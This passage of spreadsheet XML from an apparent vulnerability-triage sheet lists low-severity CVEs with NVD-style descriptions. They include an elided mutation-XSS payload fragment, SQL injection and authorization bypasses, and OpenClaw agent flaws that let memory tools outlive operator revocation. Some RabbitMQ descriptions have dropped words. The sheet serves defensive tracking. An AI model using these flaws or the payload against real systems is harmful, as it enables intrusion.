      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-1218</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>The mysqlnd wire protocol parser reads fields out of server packets before checking that the packet still holds enough bytes for them. A malicious or compromised MySQL server can send a truncated packet and make the client read past the end of the packet buffer, which is undefined behaviour and can crash the process.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-1218</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100417</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>RustDesk before 1.5.0 on Windows fails to enforce the one-way file transfer option against peer clipboard file requests, allowing authenticated peers to read files from the host clipboard. Attackers can send FormatDataRequest and FileContentsRequest messages to retrieve copied files by guessing the FileGroupDescriptorW format identifier.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100417</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100537</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 fails to apply the originating requester's effective tool policy during Active Memory automatic recall. In deployments that use Active Memory together with requester-specific tool rules, deterministic and hidden recall paths can retrieve durable memory and inject it into the agent's context even when toolsBySender explicitly denies that requester access to the memory tools (memory_search, memory_get). As a result, an admitted but denied sender can receive information derived from durable memory in the agent's response without directly invoking any memory tool. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100537</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100542</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.5.28 and &lt; 2026.8.1 mishandle archive listings in the tar.bz2 skill installer: bounded command-output suffixes were treated as complete listings of the archive. A crafted .tar.bz2/.tbz2 skill archive can push prohibited entries out of both retained listings so that entry-count and size checks pass, and the archive is then extracted in full. If an operator approves installation of such a malicious or compromised skill archive, over-limit files or entry counts are persisted in the skill tools directory, consuming disk space or inodes. The issue bypasses OpenClaw's extraction budgets but does not by itself execute archive contents. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100542</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97721</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Sanluan PublicCMS up to 6.202506.e. This vulnerability affects the function CmsContentAdminController of the file publiccms-parent/publiccms-core/src/main/java/com/publiccms/controller/admin/sys/SysUserAdminController.java of the component exportExcel/exportData. This manipulation of the argument userId/deptId causes authorization bypass. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97721</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100539</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>2.6</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 fails to revoke memory tool access when an operator hot-disables memory configuration. Existing memory_search and memory_get tool instances retain the enabled configuration captured at creation time because the execution-time resolver treats explicit disablement like an unavailable configuration snapshot and restores the stale authority. As a result, during an already-running agent turn the model can continue searching and reading durable memory after the operator revoked that access, for the remainder of that run. Exploitation requires memory to be disabled while a previously created memory tool remains active. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100539</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65828</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, the legacy destroy_form action on AttachmentsController deletes UploadCache Store records based solely on a user-supplied form_id without verifying that the requesting user owns those records. An authenticated attacker who learns another user's pending-upload UUID can silently remove temporary file uploads before the victim submits their ticket or article. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65828</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67234</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, get_auth_mechanism/1 used term_to_binary/1 on the strict_auth_mechanism or preferred_auth_mechanism atom when clearing the corresponding cookie, producing a non-ASCII cookie name that violates RFC 6265 and can prevent the browser from deleting the preference. The issue is not directly exploitable for code execution or data exfiltration; its security relevance is limited to stale authentication-mechanism preferences persisting across logout and login cycles. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67234</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67420</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5, RabbitMQ OAuth credential refresh retains revoked runtime tags. when an existing AMQP connection refreshes from an OAuth token that grants the impersonator tag to a valid same-username token that no longer grants that tag, RabbitMQ updates the OAuth backend implementation (token/scopes/expiry) but leaves the connection's runtime #user.tags unchanged. rabbitaccesscontrol:checkuserid/2 then still honors the stale impersonator tag, so the connection (including newly opened channels) can continue publishing messages with a foreign AMQP userid after that privilege should have been revoked. A fresh connection using the downgraded token correctly refuses the same publish, proving the defect is stale session state rather than the token Limited to connections that once held impersonator and successfully refresh to a downgraded same-username rabbitauthbackendoauth2 (or an equivalent refresh-capable backend that returns tags) is enabled for This issue is fixed in versions 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67420</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92106</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dashbitco lazy_html allows mutation XSS via a parse and serialize round-trip of attacker-supplied HTML.
LazyHTML.to_html/2 and LazyHTML.Tree.to_html/2 decide whether to escape an element's text from its tag name alone. A style or script element inside SVG or MathML foreign content is parsed with character references decoded, but is serialized as an HTML raw-text element, so its text is emitted unescaped. Encoded markup such as &amp;lt;/style&amp;gt;&amp;lt;img src=x onerror=...&amp;gt; inside &lt;svg&gt;&lt;style&gt; therefore closes the element on re-parse and becomes live markup. Applications that parse untrusted HTML with lazy_html, filter the document or tree, and serialize it for display are affected, since the payload is a plain text node that no element or attribute filter sees.
This issue affects lazy_html: from 0.1.0 before 0.1.13.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92106</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96874</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>go, cargo</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in the Mediawiki - Cargo extension allows Stored XSS.
This issue affects Mediawiki - Cargo extension: through 3.9.4.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96874</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56729</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-280, CWE-284</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.2, when multiple KB categories have different editor roles assigned, a user with knowledge_base.editor in one category can see answer titles and updated_at timestamps from categories they do not have editor access to , via the global quick search. Category names are not leaked, and opening the answer returns "Page not found," but the title alone may disclose sensitive information. This vulnerability is fixed in 7.0.2.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56729</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66078</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6, protected tag bypass via bulk-delete. dELETE /api/users/:name refuses to delete users tagged protected (rabbitmgmtwmuser:deleteresource/2 checks isprotecteduser). POST /api/users/bulk-delete iterates the supplied username list and calls rabbitauthbackendinternal:deleteuser/2 directly , that function has no protected-tag check , so the guard is silently An administrator can delete protected-tagged service accounts via the bulk endpoint, bypassing a safeguard the test suite confirms is rabbitmqmanagement enabled Attacker has the administrator tag A protected-tagged user. This issue is fixed in versions 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66078</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97884</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file updatestudent.php of the component Student Update Functionality. The manipulation of the argument eno results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97884</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100071</t>
        </is>
      </c>
      <c r="D264" s="5" t="inlineStr"/>
      <c r="E264" s="5" t="inlineStr"/>
      <c r="F264" s="5" t="inlineStr"/>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
